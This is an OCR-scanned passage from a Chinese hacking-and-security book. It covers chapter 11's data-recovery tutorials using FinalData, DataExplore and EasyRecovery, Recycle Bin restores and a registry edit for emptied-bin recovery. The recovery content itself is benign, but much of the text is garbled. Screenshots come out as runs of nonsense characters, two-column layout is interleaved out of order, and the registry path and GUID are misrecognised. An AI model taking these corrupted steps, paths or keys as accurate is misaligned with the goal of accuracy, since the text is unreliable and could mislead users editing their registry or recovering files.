Estee 图 打开 本 地 磁盘 D， 即 可 在 其 窗口 中 看 
到 恢复 后 的 “ 美 图 rar” 压 缩 文件 ， 如 下 图 
所 示 。 


= 日 目 -| sea - oO x 
吉 涯 ”本 © 
个 二 i » SD) | Me 
Ee wn 
ODrive mIa 
a 
se nt 
ED 下 =SE 
EL 是 =P 录 
因 xx wn 
dot 
二 外 iaadoa 
小 二 未 号 sdcbeoremweamrcsezip 
加 号 ceo 2o7mr 
全 Windowalo [cj 
一 Ha 
一 TEE 
HR 四 
一 FE 
PT v« > 
2 EE 261 kB 国 s 


绝招 13: 使 用 FinalData 恢 复数 据 


FinalData 都 能 够 通过 直接 扫描 目标 磁 总 
盘 抽取 并 恢复 出 文件 信息 〈 包 括 文件 名 、 
文件 类 型 、 原 始 位 置 、 创 建 日 期 、 删 除 日 期 、 
文件 长 度 等 )， 用 户 可 以 根据 这 些 信息 方便 
地 查找 和 恢复 自己 需要 的 文件 。 

这 里 以 本 地 磁盘 F 盘 中 丢失 的 “ 美 
图 rar” 文 件 为 例 ， 介 绍 FinalData 恢复 数 
据 的 方法 。 


1. 安装 FinalData 软 件 


stp 回 双击 下 载 的 FinalData 安装 程序 ， 打 
开 “ 欢 迎 使 用 “FINALDATA” 安 装 向 导 ” 
窗口 ， 单 击 “ 下 一 步 ” 按 钮 ， 如 下 图 所 示 。 


上 FINALDATA 安装 


一 X 


欢迎 使 用 “FINALDATA” 安装 向 导 


这 个 向 导 将 指引 你 完成 “FTNALDATA" 的 安装 进程 。 
ee 


单 击 [下 一 步 铝 )] 继续 。 


数据 县 复 =u 


DT] 

Ep 国 壕 入 “选择 安装 位 置 ” 窗 口 ， 在 其 中 
输入 文件 的 安装 路 径 ， 单 击 “ 安 装 ” 按 钮 ， 
如 下 图 所 示 。 


匡 FINALDATA 安 六 =- x 
迁 提 安装 位 轩 TE 
选择 "PTIALDATA 的 雪 装 文件 赤 。 村 


es 
为 高 放 提 人 夏 放 家， 请 不 要 和 本 软件 安装 到 要 作文 伯 的 和 中 。 


i a 


目标 文件 夹 
所 碑 \OkDstakecovary 


了 文件 夫 ， 单 击 [浏览 (8)] 并 选择 其 


] [Lo |] 


所 须 空 间 :4.90 
可 用 空间 ，28.968 
TPRALDATA 


< 上- 步 0 ENC) 


进入 “正在 完成 “FINALDATA” 安 
装 向 导 ” 窗 口 , 选中 “运行 FINALDATA(R)” 
复 选 框 ， 单 击 “ 完 成 ”按钮 ， 如 下 图 所 示 。 


中 FINALDATA 安装 


正在 完成 “FINALDATA” 安 装 向 导 


4 


回 运 行 FMALDATA(E) 


< 上 -0) 取消 (5) 


2. 使 用 FinalData 恢 复数 据 


具体 的 操作 步骤 如 下 。 


step 回 双击 FinalData 程序 图 标 ， 打 开 Final 
Data 操作 界面 ， 如 下 图 所 示 。 
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购买 主 直 


FinalData 


DATA RECOVERY 


加 


请 选择 名 返 到 的 问题 《 尽 标 传 留 在 功能 按 铺 可 查看 详情 》 


EG | | ko 


| 
席 册 给 文 忻 | 训 格 式 化 树 皮 | 


D 便 用 教程 。@@ 用 户 评价 


多 


[Bp 图 单 去“ 误 删 除 文件 ”图 标 ， 进 入 “请 
选择 要 恢复 的 文件 和 目录 所 在 的 位 置 ” 对 
话 框 ， 在 其 中 选择 本 地 磁盘 F， 如 下 图 所 示 。 


由 


FinalData RE 
DATA RECOVERY LL 


葬 吉 反 费 忆 抽 的 文件 和 日 寻 所 在 的 位 加 
em 
守信 
让 和 上 


经 删除 的 文件 ”对 话 框 ， 程 序 开始 对 下 盘 
进行 快速 扫描 ， 以 查找 下 盘 内 删除 的 目录 
和 文件 ， 如 下 图 所 示 。 


购买 注册 


FinalData 
DATARECOVERY 加 使 用 教程 【人 用户 评价 


查找 已 经 删除 的 文件 
王 在 及 件 , 清和 柑 … 
TT 


当前 找到 的 已 到 文件 : 
工 NEesVanialatrataryamacaNLecdlyTeyVaaapaie mtasu 1 


[Sep 加 在 程序 扫描 完成 后 ， 自 动弹 出 “扫描 
结果 ”对 话 框 ， 在 其 中 选择 要 恢复 的 文件 ， 
这 里 选中 “ 美 图 rar” 前 面 的 复 选 框 ， 如 下 
图 所 示 。 
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FinalData 
DATA RECOVERY 

所 描 结 果 
最 后 不 限 ”~ 夫 开打 页 已 ”大 车 届 


9 对 放量 


PT 


固 用 户 评价 


复 路 径 ” 对 话 框 ， 在 其 中 输入 恢复 文件 存 
放 的 目录 ， 如 下 图 所 示 。 


Fn 


选择 恢 旧 路径 


FinalData 


DATA RECOVERY 


加 对 注册 


何 使 用 并 程 。 国 用 户 评价 


清寺 各 一 个 未 存 外 做 汪 涉 的 广 : 
DVR 


各 卫 全 主要 收 ， 请 号 外 过 所 录 人 中 的 文 件 
个 


过 择 杀 得 件 上 
变种 大 中 总 计 。 261.61 。 加 


step 较 或 单 击 “ 浏 览 ” 按 钮 打开“ 浏览 文 
件 夹 ”对 话 框 ， 在 其 中 选择 恢复 文件 保存 
的 路 径 ， 如 下 图 所 示 。 


浏览 文件 突 


和 Windows10 (C) 


站 AApasswordRecovery 

a adobe acrobat pro9 
， 国 AdobeAcrobatpro lite 
， 恒 adobereader 9 

apdfprent.cn_gr 


文 # 夫 | 本色 (H) 


mm | | 


FinalData 


DATA RECOVERY 


网 关 注册 


加 


选择 导 虽 路 径 


合作 用 载 程 “加 用 户 年 价 


请 运 入 个 局 示 存 到 机 二 的 六 作 : 
on 


加 了 ， 妇 并 广 并 要 于 下， 请 另外 过 择 户 对 让 汶 估 二胡 文件 。 
这 所 各 要 文 泊 : t 


交大 由 吉 计 :15 本 


[Step 图 单 去 “下 一 步 ” 按 钮 ， 即 可 开始 恢复 
数据 ， 完 成 数据 恢复 后 ， 返 回 存放 路 径 即 
可 查看 恢复 后 的 文件 ， 如 下 图 所 示 。 


加 口 X 
地 挡 加 9 
€ 个 加 此 志 防 本 地 芭 去 HH) 
km 
二 rarkeyd.9756 
@ oneDrve xlkeyd 9748 0) 
| AdobeAcrobatpro lie 

ET 本 adobe scrcbet pro9 

于 3 显 porEncopt 

SL dobereaderg 

四 xs 司 apdfprerten gr 

Fe Excelceye. 

reeyd. ss 
省 二 
a 是 :oLhb-aoxpprz24- 何 

下 时 hwordpasswordrecoveny yloLaindy 2 
各 Windows10 (C:) Rr 

二 HE 二 (D) 

PE 

= HF 

一 本 (HJ) 

ve« 
TB N11 01 9 


数据 


《数据 恢复 大 师 (DataExplore)》 是 一 
款 功 能 强大 、 提 供 了 较 低 层次 恢复 功能 的 
硬盘 数据 恢复 软件 ， 支 持 FAT12、FAT16、 
FAT32、NTFS 文件 系统 ， 可 以 导出 文件 夹 ， 
能 够 找 出 被 删除 、 被 快速 格式 化 、 被 完全 
格式 化 、 被 删除 分 区 、 分 区 表 被 破坏 或 者 
Ghost 被 破坏 后 的 硬盘 文件 。 


1. 恢复 已 删除 的 文件 


step 国 单 去 “确定 ”按钮 ， 返 回 到 “选择 恢 


复 路 径 ” 对 话 框 中 ， 如 下 图 所 示 。 
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step 国 在 《数据 恢复 大 师 》 主 窗口 中 单 击 “ 数 
据 ” 按 钮 ， 打 开 “ 选 择 数据 ”窗口 ， 如 下 
图 所 示 。 


E> x 
ea A 
bp: Omrs 200 es 
| 本 式 化 的 路 夏 mrs 222010) ER 
Lomrszeam 
| Ee | Ck OFS 6) 
EE 
host 的 全 


选择 左 侧 的 “删除 的 恢复 目标 文件 丢 
失 的 恢复 ”选项 ， 在 其 中 选择 所 需 恢 复 的 
分 区 ， 如 下 图 所 示 。 


加 


第 11 章 “磁盘 数据 的 备份 与 恢复 技巧 = 


可 将 其 导出 到 别 的 分 区 或 硬盘 。 


所 petaBplorcgs 二 5 生硬 V2.53 天池 到 村 承 公 司 …- - 0O x 
文生 全 视 周 (D。 一 功 这 四 ”要 看 节理 口 图 一季 二 好 


| 才思 轨 电 受 
LE| “上 坦 斩 排 记 执 沁 


es 
i hh 


Ep 
全 部 六 阵 长 慎 。39.99 
ee 

[@ CR 


step 阳 在 “列表 视图 ” 窗 格 中 选中 需要 恢复 


RE 
Ee 


step 图 单 去 “确定 ”按钮 ， 系 统 开 始 扫描 丢 
失 的 数据 ， 在 完成 数据 的 扫描 和 查找 之 后 ， 
所 查找 到 的 文件 将 会 显示 在 文件 夹 视图 和 
列表 视图 中 ， 如 下 图 所 示 。 


| 轩 patoExploregstr 生 大 而 V2.53 “再 和 可 队 公司 一 - 0O x 
| 六 位 术 图 人 0。 力 肛 | 呈 亚 痢 他 而 口 (可 失 人 0 

全 办 入 于 和 

吧 让 三 虹 晶 品 显 证 名 导 志 

[EL = 

8 六 伯 


NF; ED 
下 局 到 类 的 文人 Dl 
加 门 局 己 W 避 的 文 并 33. 955N| 
人 ET 


“ 国 和 er 3 0825 fre 
和 010i-03 14 O07. 52 这 此 系统 位 于 
| mm 1064T 和 


[Eee 加 在 《数据 恢复 大 师 》 窗 口 的 左 侧 选 择 
“已 删除 的 文件 ”选项 ， 即 可 在 右 侧 窗 格 
中 显示 出 其 具体 数据 列表 ， 如 下 图 所 示 ， 


的 数据 并 右 击 ， 在 弹出 的 快捷 菜单 中 选择 
“导出 ”菜单 命令 ， 如 下 图 所 示 。 


[ER V2 53 -于 和 可 隐 公司 ……- 0 Xx 

唐人 E)。 神 间 {0D 功 条 [I 查看 人 0 而 口 [BD 村 好 (0 

让 办 公 和 | 今 介 

国 向 上 宣 扑 提 序 昌 动 可 BW 疗 志 

[Td " 

3 文件 碍 | 

= 可 

Bow NTFS T2916 2013-11-14 
局 mp 好 


| 


"BE a 1 a fbresrs ts 区 
EE Th 村 


习性 
天 出访 下 来 


er 


[step 图 打开 “提示 ”对 话 框 ， 提 示 用 户 要 把 
文件 导出 到 别 的 硬盘 或 者 分 区 上 ， 千 万 不 
要 往 要 恢复 的 分 区 上 写 入 新 文件 ， 以 避免 
破坏 数据 ， 如 下 图 所 示 。 


提示 X 


请 您 把 文件 导出 到 别 的 硬盘 或 者 分 区 上 . 
千 万 不 要 往 要 恢复 的 分 区 上 瑟 入 新 文件 送 锡 破坏 数据 ! 


Ee | 


step 车 单 去 “确定 ”按钮 , 打开 “浏览 文件 夹 ” 
对 话 框 ， 在 其 中 选择 要 恢复 文件 的 保存 路 
径 ， 如 下 图 所 示 。 
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Se a 


浏览 文件 去 状 _ 
人 me | 
pe , ee 
ES 


a [step 图 单 去 “确定 ”按钮 ， 系 统 开 始 扫描 丢 
二 “用 十， 要 名， 站 可 开 地 居 生 于 | 拓 的 坟 据 ， 在 完成 所 的 扫描 和 查找 之 后 ， 


文件 恢复 ， 二 十 肌 所 放 所 示 
不 。 
三 | 回国 :| zt 到 和 (H) - 0O x re ox 
EY =x := ss e BD 量 (0 玫 中 人 D。 帮 凤 | 
祖 ”个 本 ， 此 电 ，， 二 地 三. v 已。 更衣 -本 地 让 下， 有 国名 是 :网 | 如 | 和 名 站 志 
人 去 称 ~ | 
者 快速 访问 
性 dataexplorezip 
人 OneDrive 对 美 图 rar 
国 此 电脑 性 Final hazip 
图 视 需 性 datarecoven5zip 
加 凤 t 性 fr8476zip 
pany 性 HA_FinalRecovery226275_OFA.rar 
四 x 忆 risfv23.1.78.51.exe 
时 人 性 0G492371_xe6zip 
小 醒 乐 殴 DGSetup_12758.exe 
国 5 硬 ccentExcelpasswordRecoveryv5 a UE Bresu eT « CE &F | re] 
Windows10 lc 履 excelpr 2zip v ae dB somes Ri tT ee 27 下 
Pe ve > 
51 个 项 目 。 选中 1 个 项 目 261 KB 国 旧 E27 


2. 恢复 格式 化 后 的 文件 3. 恢复 因 分 区 丢失 的 文件 


[step 团 在 《数据 恢复 大 师 》 主 窗口 中 单 击 ”[step 加 在 《数据 恢复 大 师 》 主 窗口 中 单 击 
“数据 ” 按钮， 打开 “选择 数据 ” 对话 “数据 ”按钮 ， 打开 “选择 数据 ”对 话 


框 ， 如 下 图 所 示 。 框 ， 如 下 图 所 示 。 
PE | x 
= 本 

模式 化 的 恢 豆 EE es Ev 反 半 | 
EE | 
Bhost 的 但 时 ee96 和 


[step 图 选择 左 侧 的 “格式 化 的 恢复 ”选项 ， [step 图 选择 左 侧 的 “丢失 分 区 的 恢复 ”选项 ， 
在 其 中 选择 所 需 恢复 的 分 区 ， 如 下 图 所 示 。 ”在 其 中 选择 所 需 恢 复 的 分 区 ， 如 下 图 所 示 。 
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下 x 
四 ee 
Er 
Eees [2 
上 
的 分 
PF NS 72910 [a 蕉 确 
一 证 NT 本 | fa 


pet 约 协 避 


[Va Xns| 


[step 图 单 去 “确定 ”按钮 ， 系 统 开 始 扫描 丢 
Pr 在 完成 扫描 和 查找 之 后 ， 所 查 
找到 的 文件 将 会 显示 在 文件 夹 视图 和 列表 


第 11 章 ”磁盘 数据 的 备份 与 恢复 技巧 = 


和 一 一 x 
Be 六 Cr 二 | 
-二 pe es 大 | 
四 种 笠 19 下 
EE [i] OFS .30) 
Ghost 的 居 夏 


Ve We] 


[step 图 选择 左 侧 的 “Ghost 的 恢复 ”选项 ， 
po 分 区 ， 如 下 图 所 示 。 


视图 中 ， 然 后 将 其 导出 即 可 ， 如 下 图 所 示 。 E73 x 
Te] -a x [ea pp 和 
Ee oe 只 护 四 看 中富 DD) sen ee SR | 

本 pe se 
国 站 忒 日 易 总 品 吕 各 和 各 Ce 
也 蝇 未 果 乏 的 久 伟 - " | EF: Os 122030) | ce, 
昌文 件 | a Fi Qs T2536) 分 世 护 包 亲 亿 
一 NSS > Ct] TF 339) ee 
2 A 
pe 
Eee 
es 
rego 
mes ahi 到 下 
| as 
| -可 | 设置 立 件 此 开 
| ma . 
| Cp 
Deen 
| | D wt MX nn 
lt x o 站 
A 0 * 疯 14 19. Snare 位 于 
We TD 列 hamnprwnaaa bo 
量 E 
i 侈 提示 : 如 果 是 分 区 对 硬盘 Ghost， 则 选择 


如 果 看 不 到 , 则 可 在 选中 所 要 恢复 数据 
的 硬盘 HD0 或 HD1 之后, 单 击 “ 快 速 扫描 丢 
失 的 分 区 ”按钮 , 即 可 打开 “快速 扫描 分 区 ”对 
话 框 。 单 击 “ 开 始 扫描 ”按钮 , 即 可 快速 扫描 出 
原来 丢失 的 分 区 , 如 下 图 所 示 。 


ES A WT 


攻 司 [aa 


4. Ghost 的 恢复 
[step 图 在 《数据 恢复 大 师 》 主 窗口 中 单 击 
“数据 ”按钮 ， 打 开 “ 选 择 数 据 ” 对 话 
框 ， 如 下 图 所 示 。 


所 要 恢复 数据 的 硬盘 HD0 或 HD1, 单 击 “ 快 
速 扫描 丢失 的 分 区 ”按钮 ， 即 可 打开 “ 快 
速 扫描 分 区 ”对 话 框 。 单 击 “ 开 始 扫描 ” 
按钮 ， 即 可 快速 扫描 出 原 有 分 区 。 


快速 扫 浴 分 区 x 


驱动 器 


ee 


step 图 单 击 “ 确 定 ” 按 钮 , 打开 “属性 对 话 框 ” 
对 话 框 ， 在 其 中 进行 相应 设置 ， 查 找 更 多 
的 文件 内 容 ， 如 下 图 所 示 。 
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属性 对 话 框 x 


加 查找 更 多 的 文件 类 型 


Doc 文 件 
PPT 文 件 


搜索 DOC 文 件 
搜索 PPT 文 件 
搜索 XLS 文件 
搜索 JmB 文 件 
搜索 DWG 文 件 
搜索 BP 文件 
搜索 6IF 文 件 
搜索 JPG 文 件 
搜索 PSD 文 件 


[step 园 单 直 “确定 ”按钮 ， 系 统 开始 扫 描 丢 
失 的 数据 ， 在 完成 扫描 和 查找 之 后 ， 所 查 
找到 的 文件 将 会 显示 在 文件 夹 视图 和 列表 
视图 中 ， 然 后 将 其 导出 即 可 ， 如 下 图 所 示 。 


1 DatoEoplorear 民 天寿 V2 53 一 天 芝 二 Ph 恨 公司 
文件 (把 六 要 人 0 功能 (二 看 人 | 丙 口 殷 部 贡 

四 由 司 人 
团 总 名 商品 | 蝙 且 | 明 | 名 名 小 
[a ET = 
加 匀 伯 赤 | 
ET 

lem 
Da 
Mr 
| ES 
EE 

区 


11.4 ”实战 演练 
日 实 战 演练 1 一 一 格式 化 硬盘 后 的 恢复 


: 以 前 当 格 式 化 硬盘 后 ， 就 不 用 再 考虑 
数据 的 恢复 了 ， 但 当 有 了 EasyRecovery 软 
件 后 ， 这 一 问题 就 得 到 了 解决 。 下 面 就 以 
格式 化 本 地 磁盘 D 后 再 对 其 数据 进行 恢复 
为 例 ， 具 体 介绍 一 下 格式 化 硬盘 后 的 数据 
恢复 ， 具 体 的 操作 步骤 如 下 。 
[step 图 双击 桌面 上 的 EasyRecovery 快捷 图 
标 ， 打开 EasyRecovery 主 窗口 ， 如 下 图 
所 示 。 
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Ontrack ES 
EasyRecovery 


Professional 


step 园 单 击 EasyRecovery 主 界面 上 的 “ 数 
据 恢复 ”选项 ， 即 可 进入 软件 的 “数据 恢 
复 ” 窗 口 ， 在 其 中 显示 了 “高 级 恢复 ”“ 删 
除 恢复 ”“ 格 式 化 恢复 ”“ 原 始 恢 复 ” 等 功 
能 ， 如 下 图 所 示 。 


| EBSJRecovery- 8 
2 
A 快 加 向 到 
= 数据 恢复 
三 名 请 及 
删除 恢复 
i 司 : 
本 ss (er 
格式 化 详 复 原始 恢复 
4 中 af 人 人 
着 中 恢复 文件 结构 信息 的 恢复 


紧急 引导 盘 


加 继续 恢复 国 
名 续 已 保 革 的 数 
一 二 创建 发 旬 引 导 盘 


[step 国 单 击 “ 数 据 恢复 ”选项 中 的 “格式 化 恢复 ” 
按钮 , 即 可 开始 扫描 系统 , 如 下 图 所 示 。 


请 稍 候 
正在 扫描 系统 .. . 


[See 国 在 扫描 结束 后 ， 将 会 弹出 “目的 地 警 
告 ” 警告 提示 ， 建 议 用 户 将 文件 复制 到 不 
与 恢复 来 源 相 同 的 一 个 安全 位 置 ， 如 下 图 
所 示 。 


和 
机 大 过 


| 讽 定 | 


厂 不 再 显示 该 消息 


[step 了 图 单 击 “确定 ”按钮 ,将 会 自动 弹出 “ 格 
式 化 恢复 ”对 话 框 ， 提 示 用 户 选择 一 个 要 
恢复 删除 文件 的 分 区 ， 这 里 选择 DD 盘 ， 如 
下 图 所 示 。 


选择 您 重新 格式 化 的 分 区 , 进 择 以 前 的 文件 系统 , 并 单 主 "下 一 步 ” 开始 扫 芝 文件 。 连 择 “取消 ” 运 出 工具 - 


TA 


pe 工具 酝 公 许 您 从 分 区 中 恢复 文件 ， 这些 分 严 补 意外 
| 塌 属 式 化 或 重新 友 壬 了 。 访 友 开 儿 有 和 各 咯 开 有 的 又 件 于 统 结 
| 移 ， 江 宕 斌 搜索 以 前 祥 件 系统 得 5 枸 ， 


“以 前 的 文件 系统 ”村 允许 您 为 分 区 选择 以 前 的 文件 系统 类 型 * 请 
汪 风 地 册 各 更 多 导电 。 


间 EN MPs 007. 42 68) 
NDS Gl1.05 on) 


以 商 的 文件 系统 
[ms 习 


人 ‘un er 
step 较 单 击 “ 下 一 步 ” 按 钮 ， 开 始 扫 描 选 定 
的 磁盘 ， 并 显示 扫描 进度 ， 如 已 用 时 间 、 
剩余 时 间 、 找 到 目录 、 找 到 文件 等 ， 如 下 
图 所 示 。 


-= 正在 处 理 区 块 : 2404150 / 116976627 
已 用 时 间 : 2:17 
剩余 时 间 : 1:48:48 
找到 目录 : 12011 

B1633 

mousewnl. gif 


找到 文件 : 
上 次 文件 : 


在 扫描 完毕 后 ， 将 扫描 到 的 相关 文件 
yo hp 
右 侧 则 显示 具体 删除 的 文件 信息 。 在 其 中 
选择 要 恢复 的 文档 或 文件 夹 ， 这 里 选择 “图 
片 rar” 文 件 ， 如 下 图 所 示 。 


FW E35 Recovery 
eo as 
格式 化 信 复 
渤 中 你 起 要 浆 生 的 文件 ， 渴 皖 “下 一 步 ” 你 疆 到 “有 的 地 连 皖 ” 屏 莫 。 连 择 “后 ”后 到 “分 区 连 
择 ” 屏幕 ， 选 泽 “取消 ” 退出 工具 . 
日 园 忆 我 的 欧 动 器 <^ | 天 称 大 小 EE 委 件 
目 侣 岛 WExtra Deleted 1 运 日 GHOSTXP.. 59915 MB 10/3/2016 6 
自 侣 入 ecycleBin 回国 rar ”41 MB 6 
OD srecvctean 口 imte 5313 6 
gO SREc/cLE en Tamse 30c0 Ko x 量 
x 


巾 口 自 SRECYCLEBIN 一 


ka 再 6 

BBB1 人 文件 , 共 481 MB 

着 色 ! 
里 已 加 灾 四 已 于 纵 


= ew ars e=s 


厂 使 用 过 妃 器 QD。 过 污 非 半 项 (0) | ”三才 四 


第 11 章 ”磁盘 数据 的 备份 与 恢复 技巧 ES 


step 图 单 去 “下 一 步 ” 按 钮 ， 可 在 弹出 的 对 
话 框 中 设置 恢复 数据 的 保存 路 径 ， 如 下 图 
所 示 。 


号 # 大 4.81 本 
收 刘 号 名 地 进项 
[E23 


3 
厂 生 且 可 
[ 济 和 


step 图 单 去 “浏览 ”按钮 ， 打 开 “ 浏 览 文件 
夹 ” 对 话 框 ， 在 其 中 选择 恢复 数据 保存 的 
路 径 ， 如 下 图 所 示 。 


油 交 文件 实 x 


[Sep 四 单 去 “确定 ”按钮 ， 返 回 到 设置 恢复 
0 


格式 化 怖 复 


适时 一 个 将 忆 外 下 握 的 目的 地 。 壬 择 “ 下 一 步 ”开始 旨 抽 文件 。 洁 择 “后 盟 ” 汉 加 “标记 文件 居 复 " 屏 
总 交友 -下 车 识 出 T 县 
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SS 黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


[step 了 加 单 去 “下 一 步 ” 按 钮 ， 软 件 自 动 将 文 
件 恢复 到 指定 的 位 置 ， 如 下 图 所 示 。 
正在 冬 制 数据 


5 当前 文件 : 图 片 .rs 
已 用 时 间 : 2 秒 
剩余 时 间 : 

已 恢复 1 / 1 个 文件 
已 恢复 2. 94 NE /4.81WB 


step 图 在 完成 文件 恢复 操作 之 后 ，Easy 
Recovery 将 会 弹出 一 个 恢复 完成 的 提示 信 
息 窗口 ， 在 其 中 显示 了 数据 恢复 的 详细 内 
容 ， 包 括 源 分 区 、 文 件 大 小 、 已 存储 数据 
的 位 置 等 内 容 ， 如 下 图 所 示 。 


取消 


“打印 ”来 打 印 恢复 地 要 ， 选择 “ 保 仓 ” 米 将 依 复 摘要 保存 到 文件 中 。 选 译 “ 后 襄 ” 送 回 到 “其 制 目 
的 ” 屏 划 ,或 选择 “完成 ” 角 出 工具 
rtrear zaieeovery -他 E 
| 可 所 有 J 2000-a008 Jol Datrazk In; 
pS 于 10/151a016 9 2:0t AM 


| 基 怒 动 器 :Woc YD50 coAAS-00s910 
从 区: 由 < 

| 焉 估 夏 1 个 进 定 的 文件 * 

| 到 恢复 .91 四 数据 * 

| 山 据 已 愧 夏 到 \> 

已 恢复 ! 个 文件 。 

Bc 


[step 了 图 单 击 “ 完 成 ”按钮 打开“ 保存 恢复 ” 
对 话 框 。 单 击 “ 否 ” 按 钮 ， 即 可 完成 恢复 ， 
如 果 还 有 其 他 的 文件 要 恢复 ， 则 可 以 选择 
“是 ”按钮 ， 如 下 图 所 示 。 


保存 恢复 
您 是 否 要 保存 收复 状态 以 便 在 今后 继续 ? 


否 


实战 演练 2 一 一 还 原 已 删除 的 文件 


如 果 意 外 删除 或 重 命名 了 文件 或 文件 
夹 ， 则 可 以 还 原 该 文件 或 文件 夹 的 以 前 版 
本 ， 但 需要 知道 保存 该 文件 或 文件 夹 的 位 
置 ， 具 体 的 操作 步骤 如 下 。 

[Eee 图 选择 包含 被 删除 文件 或 文件 夹 的 文件 
夹 ， 右 击 该 文件 夹 ， 在 弹出 的 快捷 菜单 中 
选择 “还 原 以 前 的 版 本 ”菜单 命令 ， 如 下 
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图 所 示 。 


打开 (0O) 
在 新 窗口 中 打开 (E) 
国定 到 "快速 访问 " 
回 open as Brackets project 
大 使 用 QQ 音乐 更 放 (P) 
加 入 QQ 音乐 播放 队列 (E) 


授予 访问 权限 (G) 区 


还 原 以 前 的 版 本 (V) 区 
包含 到 库 中 (1) 


甩 合用 360 强 力 湖 除 
轩 使 用 360 进 行 森马 去 查 杀 
转 使 用 360 管 理 右键 荣 单 


国定 到 开始 "屏幕 (P) 
在 弹出 的 对 话 框 中 选择 文件 来 ， 如 这 
里 选择 “结果 ”文件 夹 ， 保 存 的 还 原点 
单 击 “ 还 原 ” 按 钮 ， 即 可 将 删除 的 文件 恢复 ， 
如 下 图 所 示 。 


站 结果 定位 x 


3 拓 人 王 下 义 
i 


文件 实 本 (Fj: 


很 入 以 前 (1) 
寺村 016-10.20 1150 


| zm 


Ce 


应 用 (A) 


11.5 ”小 试 身手 
练习 1: 从 回收 站 中 还 原 数据 


当 用 户 不 小 心 将 某 文件 删除 ， 很 有 可 
能 只 是 将 其 删除 到 “回收 站 ”中 ， 如 果 还 
没有 来 得 及 清除 “回收 站 ”中 的 文件 ， 则 
可 以 将 其 从 “回收 站 ”中 还 原 出 来 。 这 里 
以 删除 本 地 磁盘 F 中 的 “图 片 ”文件 夹 为 例 ， 


第 11 章 ”磁盘 数据 的 备份 与 恢复 技巧 = 


介绍 如 何 从 “回收 站 ”中 还 原 删 除 的 文件 ， ”下 图 所 示 。 
具体 的 操作 步骤 如 下 。 ED 


5 国 双 走 朱 面 上 的 “回收 站 ”图 标 ,打开 < 回 。 国有 基 全 i 
收 站 ”窗口 , 在 其 中 可 以 看 到 被 误 删除 的 “< 美 ssc 3 es 
图 ”文件 夹 ， 如 下 图 所 示 。 < 
全 | 回国 = 国 eOsI 呈 加 由 认 人 FE 
sa © 加 
玉 “人 + 
巡 快速 访 同 站 兰 慎 ee 
a 
二 
如 俩 mn EE 
小 言 手 9 E: 
国 二 本 
Et Eee 国 双击 * 美 图 "文件 夫 , 即 可 在 打开 的 “ 美 
i 图 ”窗口 中 显示 出 图 片 的 缩 略 图 ， 如 下 图 
本 地 瑟 丰 (站 E 
a 。 所 示 。 


BE 右 去 该 文件 夫 ， 在 弹出 的 快捷 菜单 中 55 EE x 
选择 “还 原 ” 莱 单 命令 ， 即 可 将 “回收 站 ”| 了 加 扑 守 入 
中 的 “图 片 ”文件 夹 还 原 到 其 原来 的 位 置 ， > 

如 下 图 所 示 。 < 也 pS 


ew [aa onjpe 02jpg D3jpg 
有 ES :x :*= ss 所 a EF 
个 国 ，Eims 0 | oe p es 
人 
y a 上 
EE) 作 国 9 
an Windows10 (C) 
RD) = 6 OD) 
ES | ee E) 
一 一 一 一 一 — HE 
ma 上 | 


练习 2: 清空 回收 站 后 的 恢复 


当 把 回收 站 中 的 文件 清除 后 ， 用 户 可 入 
以 使 用 注册 表 来 恢复 清空 回收 站 之 后 的 文 
件 ， 具 体 的 操作 步骤 如 下 。 

E55 国 右 去“ 开始 ”按钮 ， 在 弹出 的 快捷 菜 
单 中 选择 “运行 ”菜单 命令 ， 如 下 图 所 示 。 


搜索 (S) 


运行 (R) 


关机 或 注销 (U) 


桌面 (D) 


Vy 


step 图 打开 “运行 ”对 话 框 ， 在 “打开 ” 文 
F” 窗 口中 看 到 还 原 的 “ 美 图 ”文件 夹 ， 如 ”本 框 中 输入 regedit， 如 下 图 所 示 。 
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黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


杏 运行 x 


Windows 梅 根据 你 所 输入 的 名 称 , 为 你 打开 杠 应 的 程序 、 
文件 夫 、 文 栏 或 Internet 资源 。 


打开 (O): 


regedit ~ 


攻 琶 司 Ea 


step 较 单 去 “确定 ”按钮 ， 即 可 打开 “注册 
表 编 辑 器 ”窗口 ， 如 下 图 所 示 。 


图 注 节 未 搞 朝 著 - oOo x 
文件 由 注 昌 |E】 豆 看 NV) 履 到 (A) 帮 B(H) 


浏览 (8).… 


> 
HEHKEY CLASSES ROOT, | 


[step 鸭 在 窗口 的 左 侧 展 开 HEKEY LOCAL 
MACHIME/SOFTWARE/Microsoft/ 
Windows/Currentversion/Explorer/Desktop/ 
Namespace 树 形 结构 ， 如 下 图 所 示 。 


时 下 内 二 Do x 
大 奖 吕 E， 坦 看 | 才 宫 入 二 0 


半 BrokerBensons || 大 闪 sm 
a REGSZ 
oriorRegany REG_pWonp| 


(FlelnuseRecoer 

FleOperasorAcviceSinks 

旧 FndEaensons 

FyowMenuserings 。 v 

RAHKEY LOCAL MACHINESOFTWAREWicrozcfnwindoweicurrertveriiomExplcrerDesaopNamespace 


PFE" = 
ZH sa SV sas #0 


装 arokerEviendons 问世 还 
四 RN REG_SZ 
Moritoregiery REG cwoRo | 
I 
ie) 
nt) 


DWoRD pz 人 全 ID) 
OWORD (54 各 可 
ZV) 

可 林 殉 闻 有 生 信 吕 ) 


ec 
Wa HXEY.CURRENT USERT) 


HEY LOcAL MACHINESOFTWAREicrorafnwindoweicurrentyertionExploreriDeclaopNamespace 


step 罗 新 建 一 个 项 并 将 其 重 命名 为 
“645FFO40-5081-101B-9F08-00A A002F954E” 
如 下 图 所 示 。 


国王 - OO x 
人 源 E 吾 和 V) 避 (A| 厅 O 
50DeFaA-AD25-11D0-68AB-080036181103) 
399E594-6CE5-4D6C-8FCE-1DB870FDCRAO 
59031aa7-3172-4437.80c5-9595fe6ba0ee) 
bg3dbd2-522b-dc34-bbfe-37a3ef7bscgcl 


(645FFY40-5081-1018-9F08-00AA002F954E) 
64693013-1c21-4f30-ac8-4e52906d3b56] 
站 (ooass76-68D1-4c86-6454-BEBOdEgdcs1 人 
站 (FnaEaao_s30F1-4F25-ac28-553D3C65FOEA) 


占 saaaatze-1aa7-tas-snze.db2d810d9s6b) 
目 sarzrsas_errr-ThE0.aE2.7B86pFD720851 
(oooees28-ebd3-48b8-S440-8542113d4600) 
目 sarasr9a-CIEA-428d-A7a-D1F5659CBAS93) 
加 apyaze7B-21CB-4bz-A086.8309660c6B7B 
目 dfs5313-edad-4Eof-beibrebacra2c3065 
国 345D5fs397-435c-Bl95-4c322c26259c] 
